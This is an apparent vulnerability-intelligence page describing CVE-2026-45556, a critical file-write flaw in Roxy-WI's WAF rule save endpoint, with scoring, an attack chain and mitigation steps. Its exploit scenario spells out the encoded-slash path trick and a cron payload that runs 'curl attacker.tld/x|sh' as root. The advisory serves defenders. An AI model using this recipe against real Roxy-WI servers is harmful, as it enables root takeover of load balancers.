What is the CVSS score of CVE-2026-45556?

CVE-2026-45556 has a CVSS 3.1 base score of 9.9 (Critical). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.

Which versions of Roxy-WI are affected by CVE-2026-45556?

Roxy-WI versions 8.2.6.4 and earlier allow authenticated users to write arbitrary files to all managed load balancers in their group, enabling root-level code execution that could compromise…

How to fix or mitigate CVE-2026-45556?

Within 24 hours: Inventory all Roxy-WI deployments and confirm version numbers; immediately revoke or rotate credentials for users with WAF rule management access. Within 7 days: Implement network-level access controls restricting access to the WAF rule save endpoint; enable detailed audit logging of file writes to system directories (/etc/cron.d/, /etc/cron.*); consider disabling Roxy-WI if business requirements permit. Within 30 days: Monitor vendor advisories for patch availability (subscribe to Roxy-WI security feeds); conduct forensic analysis of load balancer systems for unauthorized cron jobs or suspicious file modifications; develop upgrade plan for when patch becomes available.

Roxy-WI CVE-2026-45556

EUVD-2026-36038 CRITICAL

Improper Input Validation (CWE-20)

2026-06-10 GitHub_M

Information Disclosure Nginx Apache

9.9

CVSS 3.1 · NVD

Severity by source

NVD PRIMARY

9.9 CRITICAL

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

None

Scope

Changed

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Analysis Generated

Jun 10, 2026 - 15:15 vuln.today

CVE Published

Jun 10, 2026 - 14:00 nvd

CRITICAL 9.9

DescriptionNVD

Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /waf/<service>/<server_ip>/rule/<rule_id>/save accepts a config_file_name form field that is passed straight through to config_mod.master_slave_upload_and_restart(...) as the destination path. The validation chain (_replace_config_path_to_correct → check_is_conf) only requires the path to contain a hard-coded service substring (nginx/haproxy/apache2/httpd/keepalived) and the substring conf or cfg, and to not contain ... The encoded-slash substitution 92 → / is applied before the substring check, so the attacker can build any absolute path anywhere on the LB filesystem as long as it satisfies those substring constraints. The body of the WAF rule (config form field) is written verbatim to that path. By choosing a filename like 92etc92cron.d92nginx_cfg_evil (resolving to /etc/cron.d/nginx_cfg_evil), an attacker drops a cron entry on the load balancer with attacker-controlled content. Cron parses the file on its next scan, executing the embedded job as root - full RCE on every load balancer the caller's group manages. At time of publication, there are no publicly available patches.

Articles & Coverage 2

News 11 New Apache Vulnerabilities - 4 Critical, 7 High Severity Jun 10, 2026 News Critical RCE in Roxy-WI Nginx Manager 8.2.6.4 - CVE-2026-45556 Jun 10, 2026

AnalysisAI

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated users to write attacker-controlled content to arbitrary absolute paths on managed load balancers via the WAF rule save endpoint. By dropping a malicious cron file (e.g., /etc/cron.d/nginx_cfg_evil), an attacker achieves root-level code execution on every load balancer in the caller's group. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access

Obtain low-priv Roxy-WI account

Delivery

POST crafted save request to /waf endpoint

Exploit

Bypass substring path validation via 92-encoded slashes

Execution

Write malicious cron file to /etc/cron.d on managed LB

Persist

Cron executes payload as root

Impact

Pivot across all group-managed load balancers

Access

Obtain low-priv Roxy-WI account

Delivery

POST crafted save request to /waf endpoint

Exploit

Bypass substring path validation via 92-encoded slashes

Execution

Write malicious cron file to /etc/cron.d on managed LB

Persist

Cron executes payload as root

Impact

Pivot across all group-managed load balancers

Vulnerability AssessmentAI

Exploitation	Exploitation requires a valid low-privileged Roxy-WI user account with permission to call POST /waf/<service>/<server_ip>/rule/<rule_id>/save (PR:L per CVSS), and the attacker's group must include at least one managed load balancer for the RCE to land. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) accurately reflects severe real-world risk: network-reachable, low complexity, scope-changing (the Roxy-WI web app pivots into root code execution on every downstream load balancer), with full CIA impact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker with any low-privileged Roxy-WI account (e.g., a contractor with WAF-edit rights, or a compromised operator credential) sends a POST to /waf/nginx/<server_ip>/rule/<rule_id>/save with config_file_name set to '92etc92cron.d92nginx_cfg_evil' and a config body containing '* * * * * root curl attacker.tld/x\|sh'. Roxy-WI decodes 92→/, validates the path contains 'nginx' and 'cfg', and writes the file to /etc/cron.d/nginx_cfg_evil on every load balancer in the user's group; within a minute cron executes the payload as root across the entire LB fleet.
Remediation	No vendor-released patch identified at time of analysis - the GHSA advisory (https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-85gm-773v-x7m4) states no public patches exist at publication, so monitor that advisory for an upstream fix and upgrade as soon as a patched release is announced. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all Roxy-WI deployments and confirm version numbers; immediately revoke or rotate credentials for users with WAF rule management access. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-45552 CRITICAL Act Now

9.9 Jun 10

Privilege escalation and cross-tenant compromise in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user - i

CVE-2026-45558 CRITICAL Act Now

9.9 Jun 10

Remote code execution in Roxy-WI versions 8.2.6.4 and prior allows authenticated low-privilege users (role ≤ 3) to injec

CVE-2026-45550 CRITICAL Act Now

9.1 Jun 10

Cross-tenant data tampering in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user to silently overwrite HT

CVE-2026-45564 HIGH This Week

8.8 Jun 10

Authenticated command injection in Roxy-WI versions 8.2.6.4 and prior allows low-privileged users (role <= 3, 'user') to

CVE-2026-45549 HIGH This Week

8.5 Jun 10

Privilege escalation in Roxy-WI versions 8.2.6.4 and prior allows any authenticated user - including the lowest-privileg

CVE-2026-45556 vulnerability details – vuln.today

Back

Roxy-WI CVE-2026-45556

Severity by source

CVSS VectorNVD

Lifecycle Timeline

DescriptionNVD

Articles & Coverage 2

AnalysisAI

Unlock full vulnerability intelligence

Attack ChainAIDerived

Vulnerability AssessmentAI

Recommended ActionAI

More from same product – last 7 days

Share

External POC / Exploit Code